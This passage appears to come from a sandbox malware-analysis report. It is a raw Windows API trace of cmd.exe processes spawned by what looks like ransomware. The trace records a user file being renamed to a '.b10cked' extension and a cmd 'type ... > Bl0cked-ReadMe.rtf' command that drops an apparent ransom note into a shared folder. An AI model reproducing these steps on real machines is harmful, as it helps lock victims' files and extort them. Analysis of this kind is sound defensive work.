_wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0193.824] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0193.825] _wcsicmp (_String1="user.bmp", _String2=".") returned 71 [0193.825] _wcsicmp (_String1="user.bmp", _String2="..") returned 71 [0193.825] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\user.bmp")) returned 0x20 [0193.825] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3e1e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0193.825] SetErrorMode (uMode=0x0) returned 0x0 [0193.825] SetErrorMode (uMode=0x1) returned 0x0 [0193.825] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp", nBufferLength=0x104, lpBuffer=0x22f144, lpFilePart=0x22f12c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp", lpFilePart=0x22f12c*="user.bmp") returned 0x2c [0193.825] SetErrorMode (uMode=0x0) returned 0x1 [0193.825] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1")) returned 0x2012 [0193.825] _wcsicmp (_String1="user.bmp", _String2=".") returned 71 [0193.825] _wcsicmp (_String1="user.bmp", _String2="..") returned 71 [0193.825] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\user.bmp")) returned 0x20 [0193.825] SetErrorMode (uMode=0x0) returned 0x0 [0193.825] SetErrorMode (uMode=0x1) returned 0x0 [0193.825] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp", nBufferLength=0x104, lpBuffer=0x22f5c0, lpFilePart=0x22f358 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp", lpFilePart=0x22f358*="user.bmp") returned 0x2c [0193.826] SetErrorMode (uMode=0x0) returned 0x1 [0193.826] SetErrorMode (uMode=0x0) returned 0x0 [0193.826] SetErrorMode (uMode=0x1) returned 0x0 [0193.826] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x22f7c8, lpFilePart=0x22f358 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked", lpFilePart=0x22f358*="user.bmp.b10cked") returned 0x34 [0193.826] SetErrorMode (uMode=0x0) returned 0x1 [0193.826] SetLastError (dwErrCode=0x0) [0193.826] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\user.bmp.b10cked")) returned 0xffffffff [0193.826] GetLastError () returned 0x2 [0193.826] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0x3d0e70 [0193.826] FindNextFileW (in: hFindFile=0x3d0e70, lpFindFileData=0x22ecd4 | out: lpFindFileData=0x22ecd4) returned 0 [0193.827] GetLastError () returned 0x12 [0193.827] FindClose (in: hFindFile=0x3d0e70 | out: hFindFile=0x3d0e70) returned 1 [0193.827] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp", fInfoLevelId=0x1, lpFindFileData=0x3e1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3e1be0) returned 0x3d0e70 [0193.828] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x22ef6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked", lpFilePart=0x0) returned 0x34 [0193.828] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp", nBufferLength=0x104, lpBuffer=0x22ef6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp", lpFilePart=0x0) returned 0x2c [0193.828] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\user.bmp")) returned 0x20 [0193.828] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\user.bmp"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\user.bmp.b10cked"), dwFlags=0x3) returned 1 [0193.828] FindClose (in: hFindFile=0x3d0e70 | out: hFindFile=0x3d0e70) returned 1 [0193.828] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x22ef20 | out: _Buffer=" 1") returned 9 [0193.828] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.828] GetFileType (hFile=0x7) returned 0x2 [0193.886] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.886] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22eeac | out: lpMode=0x22eeac) returned 1 [0193.886] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.886] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x22eee0 | out: lpConsoleScreenBufferInfo=0x22eee0) returned 1 [0193.886] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0193.887] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x22ef20 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0193.887] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x22ef04, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22ef04*=0x1a) returned 1 [0193.887] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.887] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0193.887] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.887] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0193.887] _get_osfhandle (_FileHandle=0) returned 0x3 [0193.887] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0193.887] SetConsoleInputExeNameW () returned 0x1 [0193.887] GetConsoleOutputCP () returned 0x1b5 [0193.887] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0193.887] SetThreadUILanguage (LangId=0x0) returned 0x409 [0193.888] exit (_Code=0) Process: id = "443" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167a0" os_pid = "0xa4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28533 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28534 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 28535 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 28536 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 28537 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28538 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28539 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28540 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28541 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 28542 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28577 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28578 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28579 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28580 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 28581 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 28582 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28583 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28584 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28585 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28586 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28587 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28588 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28589 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28590 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28591 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 28592 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28593 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28594 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 28595 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 28596 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 28597 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 28598 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 28599 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 28600 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Thread: id = 635 os_tid = 0xb54 [0193.861] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fa3c | out: lpSystemTimeAsFileTime=0x12fa3c*(dwLowDateTime=0xa86d2960, dwHighDateTime=0x1d440a9)) [0193.861] GetCurrentProcessId () returned 0xa4c [0193.861] GetCurrentThreadId () returned 0xb54 [0193.861] GetTickCount () returned 0x3710a [0193.861] QueryPerformanceCounter (in: lpPerformanceCount=0x12fa34 | out: lpPerformanceCount=0x12fa34*=25064982460) returned 1 [0193.861] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0193.861] __set_app_type (_Type=0x1) [0193.861] __p__fmode () returned 0x76b331f4 [0193.861] __p__commode () returned 0x76b331fc [0193.861] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0193.861] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0193.862] GetCurrentThreadId () returned 0xb54 [0193.862] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb54) returned 0x38 [0193.862] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0193.862] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0193.862] SetThreadUILanguage (LangId=0x0) returned 0x409 [0193.862] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0193.862] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f9cc | out: phkResult=0x12f9cc*=0x0) returned 0x2 [0193.862] VirtualQuery (in: lpAddress=0x12fa03, lpBuffer=0x12f99c, dwLength=0x1c | out: lpBuffer=0x12f99c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0193.862] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f99c, dwLength=0x1c | out: lpBuffer=0x12f99c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0193.862] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f99c, dwLength=0x1c | out: lpBuffer=0x12f99c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0193.862] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f99c, dwLength=0x1c | out: lpBuffer=0x12f99c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0193.862] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f99c, dwLength=0x1c | out: lpBuffer=0x12f99c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0193.862] GetConsoleOutputCP () returned 0x1b5 [0193.862] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0193.862] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0193.862] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.862] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0193.863] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.863] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0193.863] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.863] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0193.863] _get_osfhandle (_FileHandle=0) returned 0x3 [0193.863] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0193.863] _get_osfhandle (_FileHandle=0) returned 0x3 [0193.863] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0193.863] GetEnvironmentStringsW () returned 0x200170* [0193.863] FreeEnvironmentStringsW (penv=0x200170) returned 1 [0193.863] GetEnvironmentStringsW () returned 0x200170* [0193.864] FreeEnvironmentStringsW (penv=0x200170) returned 1 [0193.864] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e93c | out: phkResult=0x12e93c*=0x40) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x0, lpData=0x12e948*=0x98, lpcbData=0x12e940*=0x1000) returned 0x2 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x4, lpData=0x12e948*=0x1, lpcbData=0x12e940*=0x4) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x0, lpData=0x12e948*=0x1, lpcbData=0x12e940*=0x1000) returned 0x2 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x4, lpData=0x12e948*=0x0, lpcbData=0x12e940*=0x4) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x4, lpData=0x12e948*=0x40, lpcbData=0x12e940*=0x4) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x4, lpData=0x12e948*=0x40, lpcbData=0x12e940*=0x4) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x0, lpData=0x12e948*=0x40, lpcbData=0x12e940*=0x1000) returned 0x2 [0193.864] RegCloseKey (hKey=0x40) returned 0x0 [0193.864] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e93c | out: phkResult=0x12e93c*=0x40) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x0, lpData=0x12e948*=0x40, lpcbData=0x12e940*=0x1000) returned 0x2 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x4, lpData=0x12e948*=0x1, lpcbData=0x12e940*=0x4) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x0, lpData=0x12e948*=0x1, lpcbData=0x12e940*=0x1000) returned 0x2 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x4, lpData=0x12e948*=0x0, lpcbData=0x12e940*=0x4) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x4, lpData=0x12e948*=0x9, lpcbData=0x12e940*=0x4) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x4, lpData=0x12e948*=0x9, lpcbData=0x12e940*=0x4) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x0, lpData=0x12e948*=0x9, lpcbData=0x12e940*=0x1000) returned 0x2 [0193.864] RegCloseKey (hKey=0x40) returned 0x0 [0193.864] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639b [0193.864] srand (_Seed=0x5b88639b) [0193.864] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\Bl0cked-ReadMe.rtf\"" [0193.864] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\Bl0cked-ReadMe.rtf\"" [0193.864] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0193.865] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2018d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0193.865] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0193.865] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0193.865] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0193.865] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0193.865] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0193.865] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0193.865] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0193.865] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0193.865] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0193.865] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0193.865] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0193.865] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0193.865] GetEnvironmentStringsW () returned 0x2022c0* [0193.865] FreeEnvironmentStringsW (penv=0x2022c0) returned 1 [0193.865] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.865] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0193.865] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0193.865] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0193.865] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0193.865] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0193.865] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0193.865] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0193.865] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0193.866] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0193.866] 